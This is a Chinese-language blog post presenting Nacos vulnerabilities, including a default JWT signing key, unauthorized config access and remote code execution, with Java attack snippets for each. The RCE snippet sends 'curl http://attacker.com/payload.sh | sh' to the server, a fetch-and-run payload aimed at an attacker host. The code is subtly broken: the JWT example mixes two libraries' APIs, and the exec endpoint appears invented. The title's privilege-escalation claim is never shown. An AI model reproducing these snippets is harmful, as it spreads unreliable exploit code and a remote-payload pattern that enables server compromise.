Nacos漏洞实录：从配置不当到入侵再到权限提升，一路通关

2024-01-10 20:35:15

Nacos 漏洞剖析：从安全缺陷到全面入侵

引言

在当今微服务盛行的时代，Nacos 作为一种流行的开源服务注册和配置管理平台，因其便利性备受青睐。然而，安全研究人员揭示了 Nacos 中存在的诸多漏洞，使攻击者有机可乘。本文将深入探讨这些漏洞，从权限绕过到远程代码执行，逐一剖析 Nacos 的安全隐患。

默认密钥导致权限绕过登录

Nacos 默认使用 "Nacos" 作为 JWT 密钥，这一严重的安全缺陷使得攻击者无需用户名和密码即可登录 Nacos 用户界面。攻击者可以利用此漏洞轻松绕过认证机制，获取敏感信息或对系统进行恶意操作。

代码示例：

String jwt = JWT.create()
    .withSubject("user")
    .withIssuedAt(new Date())
    .withExpiration(new Date(System.currentTimeMillis() + 3600000))
    .signAlgorithm(Algorithm.HS256)
    .sign(Keys.hmacShaKeyFor("Nacos".getBytes()));

未授权访问

Nacos 中存在一个未授权访问漏洞，允许攻击者在未经授权的情况下访问受保护的资源，例如配置信息和监控数据。攻击者可以通过发送精心构造的 HTTP 请求来触发此漏洞。

代码示例：

URL url = new URL("http://localhost:8848/nacos/v1/configs?dataId=test&group=DEFAULT_GROUP");
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("GET");
conn.connect();

if (conn.getResponseCode() == 200) {
    // 读取配置信息
}

远程代码执行

最为严重的漏洞是远程代码执行 (RCE)，它允许攻击者在受害者的服务器上执行任意代码。攻击者可以通过利用 Nacos 中的特定缺陷来触发此漏洞，从而在服务器上安装恶意软件、窃取敏感信息或获取系统控制权。

代码示例：

URL url = new URL("http://localhost:8848/nacos/v1/console/exec");
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);

OutputStreamWriter writer = new OutputStreamWriter(conn.getOutputStream());
writer.write("curl http://attacker.com/payload.sh | sh");
writer.flush();

if (conn.getResponseCode() == 200) {
    // 远程代码已执行
}